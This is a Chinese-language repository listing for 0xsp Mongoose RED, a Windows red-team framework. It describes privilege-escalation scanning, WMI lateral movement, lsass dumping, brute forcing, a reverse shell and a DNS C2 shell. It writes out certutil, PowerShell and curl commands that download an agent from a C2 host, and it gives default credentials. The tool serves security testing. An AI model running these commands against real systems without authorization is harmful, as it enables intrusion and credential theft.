zux0x3a/0xsp-Mongoose

GitHub: zux0x3a/0xsp-Mongoose

一款面向 Windows 环境的红队攻防框架,集成权限提升检测、横向移动、后渗透与 C2 通信能力的综合攻击模拟平台。

Stars: 536 | Forks: 121

[![GPLv3 许可证](https://img.shields.io/badge/License-GPLv3-blue.svg)](http://perso.crans.org/besson/LICENSE.html) [](https://t.me/join0xsp) [](https://www.lazarus-ide.org/) []() [](https://discord.gg/Xsdxxkm) [](https://twitter.com/zux0x3a) # 0xsp Mongoose RED (Windows 版) 当前版本 **2.2.0** 0xsp mongoose red 版本旨在协助您进行网络安全模拟。通过使用此版本,您将能够对目标 Windows 操作系统进行审计,以发现系统漏洞、配置错误和权限提升攻击,并在网络中复制高级对手的策略和技术。 得益于 Node.js 对 Web 应用程序 API 的支持,安装和定制变得更加快捷方便。Windows 传感器 Agent 将与应用程序 API 通信以传输结果,并作为一种双向技术接收命令。 该 Agent 能够通过使用 `windows update api` 和 `exploit database definitions` 模块来识别和检测 Windows 漏洞利用,新版本还将检测以下漏洞。 * CVE-2019-0836 * CVE-2019-0841 * CVE-2019-1064 * CVE-2019-1130 * CVE-2019-1253 * CVE-2019-1385 * CVE-2019-1388 * CVE-2019-1405 * CVE-2019-1315 * CVE-2020-0787 * CVE-2020-0796 * CVE-2020-0797 * CVE-2020-1472 * CVE-2021-1675 ## 功能特性 * Windows 权限提升扫描技术。 * 使用 NodeJS 构建的 Web 应用程序 * 支持 SQLite DB * 横向移动技术。[ 视频](https://www.youtube.com/watch?v=pEpiOrpyYs8) * 双向通信通道。[ 视频 ](https://www.youtube.com/watch?v=tyhBuWCB_aY) * 插件在线打包。 * 增强的漏洞利用检测脚本引擎。 * Windows 账户暴力破解模块(本地/域) * run-as-user Windows API 函数的武器化利用。[视频](https://youtu.be/oe-BFZpV8nw) * 本地网络扫描和共享枚举。 * lsass 内存转储技术(插件)。 * DNS C2C 交互式 Shell 模式 ### 安装 ``` git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose cd 0xsp-mongoose/ npm install node index.js ``` 默认访问凭据: * 用户名:admin * 密码:0xsp []() ### DNS C2C Python 脚本 ``` touch temp.txt python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP ``` ### Agent 快速部署 ``` #example 1 curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe #example 2 powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe'); #example 3 certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe ``` ### 使用方法 ``` -s --retrieve windows services and installed drivers. -u --retrieve information about Users, groups, roles. -c --search connected drivers for senstive config files by extension. -n --retrieve network information,network interfaces, connection details. -w --enumerate for writeable directories, access permission Check, modified permissions. -i --enumerate windows system information, Sessions, Always elvated check. -l --search in any file for specific string , ex : agent.exe -l c:\ password *.config. -o --specify host address of nodejs application , you can use srvhost also -p --enumerate installed Softwares, Running Processes, Tasks. -e --kernel inspection Tool, it will help to search through tool databases for windows kernel vulnerabilities -x --password to authorize your connection with node js application. -d --download Files directly into target machine. -t --upload Files From target machine into node js application. -spooler --scan single host or list of hosts for possible CVE-2021-1675 (e.g -spooler -srvhost or -spooler -hosts ) -m --run all known scan Types together. [!] RED TEAMING TACTICS SECTION -r --spawn a reverse shell with specific account. -lr --Lateral movement technique using WMI (e.g -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip ) -nds --network discovery and share enumeration -dns --establish interactive dns C2C shell -cmd --transfer commands via HTTP Shell -interactive --starting interactive mode (eg : loading plugins ..etc) -username --identity authentication for specific attack modules. -password --identity authentication for specific attack modules. -host --identify remote host to conduct an attack to. -srvhost --set rhost of node js application. -bf --local users / domain users bruteforce module -import --import and execute dll file locally -remote --import and execute dll file from remote host ``` ### 文档 https://0xsp.com/security%20dev/0xsp-mongoose-red ### 详细研究站点 https://0xsp.com ### 安全会议 * Standoff365 - 俄罗斯 (https://standoff365.com/conferences/357) ### 工具教程 请务必订阅以下频道,以便在发布 0xsp 的新教程和技巧时收到通知 https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg
标签:0xsp, ATT&CK模拟, C2框架, Claude, Conpot, CSV导出, CVE检测, DNS 反向解析, GNU通用公共许可证, Lazarus, MITM代理, Mr. Robot, Node.js, Pascal, PE 加载器, SQLite, Web报告查看器, Windows安全, 反取证, 后渗透, 安全学习资源, 安全评估, 密码恢复, 开源软件, 提权检测, 插件系统, 攻击模拟, 无线安全, 日志监控, 横向移动, 流量嗅探, 特权升级, 用户模式钩子绕过, 端点可见性, 系统加固, 编程规范, 网络安全, 网络安全审计, 逆向工具, 隐私保护, 驱动签名利用